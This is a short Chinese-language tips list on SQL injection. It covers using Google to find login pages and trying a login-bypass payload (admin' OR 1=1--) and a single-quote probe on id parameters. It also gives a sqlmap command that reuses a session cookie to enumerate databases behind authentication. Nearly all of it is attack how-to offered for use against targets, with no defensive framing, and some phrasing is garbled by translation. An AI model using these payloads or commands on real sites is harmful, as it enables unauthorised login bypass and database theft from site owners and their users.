几个技巧小结
1.查找后台登陆界面: google: “www.target.com login”
有效率达到60%的一个sqli的payload:
2.sqli一个有效载荷: admin' OR 1=1- -'
3.对于类似这种:
https://www.target/content/recapitulation.php?id=612
尝试 SQL 注入,使用的payload: (')
4.易受攻击的目标位于需要身份验证的控制面板内,可以使用:
Sqlmap -u “https://target.com/vulnerable/sqli/?id=1" -- cookie “you're cookie session”--dbs
1)始终尝试了解目标的每个参数和每个部分。
2)使用应用程序并尝试每个值和有效负载的孩子并检查结果。
3)永远不要失去希望,做你喜欢做的事情来忘记你的痛苦。